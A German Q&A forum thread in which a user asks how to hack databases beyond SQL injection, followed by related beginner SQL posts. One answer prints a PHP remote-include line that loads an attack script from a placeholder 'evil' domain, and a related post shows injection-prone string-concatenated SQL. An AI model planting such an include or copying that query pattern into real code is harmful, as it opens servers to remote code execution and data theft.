Wie hackt man Datenbanken?

Hey, ich würde gerne das hacken von Datenbanken lernen. Wo lernen ich das am besten? Weil SQL Injection ist mittlerweile schon sehr bekannt. Gibt es da zurzeit schon neuen Taktiken ?

PS: Ich will natürlich nichts Illegales anstellen.

5 Antworten

Functional

29.08.2021, 12:48

Der Datenbankserver ist in 99,9% der Fälle vom Internet abgeschottet und nur intern erreichbar. Bedeutet, man kommt nur durch eine Injection auf einer anderen Serveranwendung (wie dem Webserver / PHP) ran, oder aber indem der Server selbst gekapert wird und dann intern Zugriff zur Datenbank verschafft wird.

Woher ich das weiß:Berufserfahrung – Inhaber einer App-Agentur & 15+ Jahre Programmiererfahrung

meirumeiru

29.08.2021, 11:55

es geht immer darum Schwachstellen und Bugs in der Software/Datenbank auszunutzen... die "Taktik" ist also, dass man entweder danach sucht, was die Programmierer falsch gemacht haben könnten oder dass man versucht Fehler von Benutzern auszunutzen (welche viel häufiger vorkommen) ... z.B. "das leere Passwort" oder sowas :-) ...

TheQ86

29.08.2021, 11:55

Wenn du keine SQL Injection machen willst, dann musst du direkt versuchen den Datenbank-Daemon zu manipulieren. Oder direkt auf das Filesystem des Servers zu kommen, wo die Daten liegen.

DualStudieren

29.08.2021, 11:56

Du tust mir Leid, würde ja gerne mein Wissen teilen, nur die Frage ist gleich ,,weg", die haben alle Angst solch ,,böses" Wissen von der Stange zu lassen, vor allem in der Moderation

Der Hackthebox Kurs ist ganz toll, also für SQLi

Und neue Taktiken, naja, es gibt immer Idioten, die es versäumen die Datenbank richtig zu konfigurieren, egal ob NoSQL oder SQL db

Das ist nicht nur ein Softwareproblem, wer ungefiltert SQL Statements an die DB gibt, hat sowieso schon verloren. Wenn dann noch der falsche Datenbank User dahinter steckt mit entsprechenden Rechten, weiß man, das der Admin kein Plan von der Sache hat. Da ist die reverse shell im Nun implementiert und der Server womöglich kompromittiert, naja, so ist es halt.

BABYX

Beitragsersteller

29.08.2021, 12:10

besteh die Möglichkeit privat zu chatten?

RonaId

29.08.2021, 12:07

Abgesehen vom sehr schwierigen Rowhammer sind die Injections so ziemlich die einzige Möglichkeit, an die Dateninhalte zu kommen, denn meist sitzt der SQL-Server im internen Netzwerk und ist wegen der privaten IP von außen nicht erreichbar. Du kommst ja ohnehin meist nur auf http(s) ran.
Social engineering wäre da so eine Möglichkeit, z.B. das Einbinden eines externen PHP-Scriptes schmackhaft zu machen.
In ein harmlos anmutendes php-Script, was durch einen Deppen auf den feindlichen Server geladen wird, muss nur eine Zeile wie

include 'http://www.boeseSeite.com/attack.php';

eingebunden werden, deren Link anfangs auch nur harmlosen Code enthält, der dann problemlos irgendwann umgeschrieben werden kann.
Aber wer sowas zulässt, macht meist ohnehin schlimmere Fehler.

Ähnliche Beiträge

SQL-Injection noch möglich 2019?

Man kann ja verschiedene tools wie SQLMAP usw benutzen um bei unsicheren php=id1 Seiten auf die Datenbanken zugriff gewähren zu können. Wie einige die sich mit dem Thema befassen wissen, gibt es noch kaum dieser Seiten zumindest nicht bei neuen Seiten. Dazu hab ich zwei Fragen, eine Theoretische Frage und eine Praktische:

Ist es möglich bei Internet Seiten jeglicher Art oder PhP die neu sind Zugriff zu gewähren ( auch solange man nicht Geohot ist oder ein Profi Hacker), kann mir jemand ein theoretisches Video dazu vorschlagen oder erklären wie das in der Theorie funktioniert falls man über SQL-Injections noch Datenbanken hacken kann?

Und evtl. wie kann man das praktisch umsetzen um Datenbanken zu hacken. Funktionieren die klassischen Linux SQL Tools überhaupt noch bei neuen Seiten, welche Alternativen gibt es um Datenbanken zu hacken?

In einem Video von ComputerPhil(ein sehr guter Kanal wie ich finde, denn er erklärt viel Theoretisches) hat über SQL Injections gesprochen die nicht mehr richtig möglich sind und das nur Theorie ist für alte Websites.

Mich interessiert Hauptsächlich die Theorie dahinter wie Hacker auf Datenbanken zugreifen, oder LogIn Felder mit Hilfe der Inhalte der Datenbanken "umgehen".

...zum Beitrag

Lokale SQL Datenbank um befehle zu lernen?

Hallo und zwar schreibe ich kommenden Montag eine Arbeit in Datenbanken Thema SQL.. nun möchte ich zuhause lernen und frage mich wie ich am einfachsten eine Lokale Datenbank anlegen kann um die ganzen Befehle wie CREATE DATABASE in die Shell einzugeben.

...zum Beitrag

Ist es schon illegal mit manipulierten URL parametern nach sql Injections zu suchen?

Ich rutsche des häufigeren mal aus und dann wird aus:

index.php?id=3

ganz schnell

index.php?id=3'

Ist dies schon illegal? Ich kann doch in die Adresszeile eingeben was ich will, oder?

Bitte antwortet nur, wenn ihr wirklich Ahnung habt. Besonders im bereich IT-Recht gibt es viel Schwachsinn und Halbwissen. Z.B. wird sehr häufig behauptet, dass Hacking-Tools illegal seien und es sie nur im Darknet gäbe.

...zum Beitrag

Womit kann ich SQL lernen?

Was für eine Codierungs Umgebung müsste ich downloaden um SQL Befehle zu lernen und Datenbanken anzulegen, quasi um SQL Code/Befehle auch zu testen?

Ich kenne das von Java und C++, dass man eine Programmier Umgebung (glaube heißt IDE) braucht um den Code zu testen. Z.b. Codeblocks.

Freundliche Grüße

...zum Beitrag

Ist Cheaten illegal? Cheatet ihr?

Hallo

Ich wollte mal fragen ob Cheaten illegal ist? Das Hacken illegal ist , ist mir klar. Aber spielt ihr zum Beispiel Sims mit oder ohne Hack/Cheat? Ich habe noch nie ge Cheatet/Hackt darum weis ich auch nicht ob das gefährlich sein könnte für die Daten auf dem Gerät. Ich hoffe ihr könnt mir helfen. Danke:-)

...zum Beitrag

Datenbank in HTML einbinden?

Hallo,

Ich soll eine My SQL Datenbank in einer HTML Seite einbinden. Desweiteren soll ich Ajax und Javascript benutzen.

Ich habe mich die letzten Tage in PHP usw... eingelesen und viel getestet aber es klappt nicht.

Entweder wird mir der PHP Code angezeigt oder der Code klappt gar nicht. Ich habe beide Dateien in der htdocs Datei von Xampp gespeichert.

Könnte mir jemand helfen?

Ich benutze Xampp für die Datenbank und Atom fürs Programmieren.

Ich kann problemlos eine HTML Seite mittlerweile erstellen aber ich bekomme die Datenbank Abfrage seiten Benutzer nicht hin und das die Datenbank mir Datensätze anzeigt.

Ich danke.

...zum Beitrag

Informatik Präsentationsprüfung Themen?

Hi,

ich mache meine P5 in Informatik und hätte gerne ein paar Meinungen zu meinen Themen. Ich bin kein Profi in Informatik aber kann mir Dinge gut aneignen.

Sicherheit von Datenbanken (SQL- Injection)
Algorithmus (Mögliche Vorschläge welchen ich nehmen könnte?)
E-Payment
Entwicklung Videospielen am Beispiel Zelda (nicht genug zum vorstellen?) oder irgendwas mit Dark Net( Vorschlag?)

wäre nett wenn mir jemand aushelfen könnte, möglicherweise auch weitere Themen vorschlagen könnte :)

Danke

...zum Beitrag

Wie kann ich den String hashen?

Ich code derzeit was in Java. Ich bekomme das Password als String vom User und hätte vorgehabt das bei der Registrierung dann mit diesem SQL command zu speichern:

String command = "INSERT INTO userdata(username, password)VALUES ('" + username + "', 'HASHBYTES('SHA2_256', "+user_password+")')";

Vorerst mal, Stimmt das so? Kann das funktionieren? Direkt in Java will ich den hash nicht generieren weil mir das unnötig aufwendig vorkommt.

Beim login habe ich vor den (schon gehashten) String des echten passwords mit dem hash der usereingabe des login passwords zu vergleichen. Doch wie mach ich das in SQL? Dass ich keine Daten in die Tabelle schreibe sondern nur verhashen lasse und dann den hash direkt zurückbekomme..

Vielen Dank im Voraus!

...zum Beitrag

Beispiel SQL Datenbank?

Hallo, ich lerne gerade für mein Informatik Abi und bin bei dem Thema Sql. Ich wollte dementsprechend ein paar Sql abfragen bei einer Datenbank machen.
jetzt das Problem:

ich wollte mir eine Beispiel Datenbank herunterladen aber finde im gesamten Netz keine Datenbank als odb Datei.

hat jemand eine Beispiel Datenbank für mich oder einen Download Link, oder eine Methode wie ich schnell eine etwas größere Datenbank kopieren oder erstellen kann?

...zum Beitrag

Ist hacken illegal wenn man sich selber hackt um in den Account reinzukommen wo man das Passwort vergessen hat?

...zum Beitrag

Manage ich eine SQl-Datenbank lieber mit PHP oder mit JAVA?

Java kann ich schon ein wenig, php nicht, doch überall schwirrt dieses phpmyadmin rum.

Mein großes Projekt lautet: "Ich will eine Datenbank erstellen, in die ausgesuchte Menschen online über eine website Daten eintragen können".

Ich frage mich nun, wie ich das angehen soll und ob ich das mit phpMyAdmin mache (und dafür php lernen muss?) oder ob ich das irgendwie mit java basteln soll.

Ich bin dankbar für jede Hilfe.

...zum Beitrag

SQL Befehle Online Testen

Guten Tag erstmal,

zu meiner Frage ich möchte für eine Prüfung SQL befehle lernen und Frage mich ob es ne möglichkeit gibt dies ohne jegliche software im Internet ausführen zu können. Datenbank erstellen Tabellen hinzufügen ect.. Ich weiß das es dazu kostenlose Programme gibt aber leider hab ich nur begrenztes Datenvolumen :/ hoffe auf hilfreiche Antworten :)

...zum Beitrag

SQL-Abfrage?

Ich lerne gerade für die Datenbanken-Klausur und muss die SQL-Abfragen können.

Bei der Aufgabenteil d) habe ich es gelöst bin mir aber nicht sicher ob es stimmt, könnt ihr mir sagen ob es richtig ist?

d) Select Movie.Movie_Title, Count(employed.Member_Name)AS Anzahl
From Movie Join employed
ON Movie.Movie_Title = employed.Movie_Title
Group By Movie.Movie_Title
Order By Anzahl DESC;

Und bei der e) und f) komme ich nicht weiter.. wie löst man so eine Abfrage?

Hoffentlich könnt ihr mir helfen..

...zum Beitrag

Eine kleine (.txt) Datenbank selber entwerfen oder sql lernen?

Was wäre effizienter?

Wenn man kein sql kann.

...zum Beitrag

Was möchtest Du wissen?

Deinen Beitrag erstellen